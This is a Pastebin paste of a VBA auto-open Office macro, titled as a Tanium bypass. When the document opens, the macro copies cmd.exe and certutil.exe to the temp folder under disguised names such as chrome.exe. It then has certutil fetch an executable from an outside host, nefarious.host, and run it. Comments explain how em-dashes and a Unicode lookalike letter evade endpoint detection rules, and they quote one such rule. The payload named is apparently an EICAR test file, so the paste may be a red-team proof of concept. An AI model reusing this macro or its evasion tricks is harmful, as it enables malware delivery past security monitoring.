SHARE
TWEET

auto-open-macro-tanium-bypass

a guest Oct 11th, 2019 198 in 41 days
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Sub autoopen()
  2. '
  3. ' autoopen Macro
  4. ' Macro created 9/26/2019 by Nefarious
  5. ' I am coming for you!
  6. '
  7. Dim fso, fso1 As Object
  8. Set fso = CreateObject("Scripting.FileSystemObject")
  9. Set fso1 = CreateObject("Scripting.FileSystemObject")
  10.  
  11. Set TmpFolder = fso.GetSpecialFolder(2)
  12. Dim RetVal
  13. Call fso.CopyFile("C:\windows\system32\cmd.exe", TmpFolder & "\chrome.exe", True)
  14. Call fso1.CopyFile("C:\windows\system32\certutil.exe", TmpFolder & "\notSertUtil.exe", True)
  15. RetVal1 = Shell(TmpFolder & "\chrome.exe /c " & TmpFolder & "\notSertUtil.exe —ur" & ChrW(7480) & "cache —sp" & ChrW(7480) & "it —f http://nefarious.host/eicar-test-files/test-upx.exe " & TmpFolder & "\firefox.exe && " & TmpFolder & "\firefox.exe /historysource 1 /scomma " & TmpFolder & "\history.csv ", 1)
  16. End Sub
  17. '
  18. 'used em-dash and or en-dashes, as well as unicode Modifier Capitol L aka 1D38 or 7480; to avoid simple automated detection like these:
  19. 'process.path ends with 'certutil.exe' AND (process.command_line contains 'decode' OR process.command_line contains 'encode' OR process.command_line contains 'urlcache' OR process.command_line contains 'split')
  20. 'and
  21. ' by pass rules that look for "normal" dashes https://github.com/0xrawsec/gene-rules/blob/master/rules/certutil.gen (some rules look for /y (slash why) and you can use -y)
  22. 'also chrome.exe and ff are less suspect when DL'ing
  23. '
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top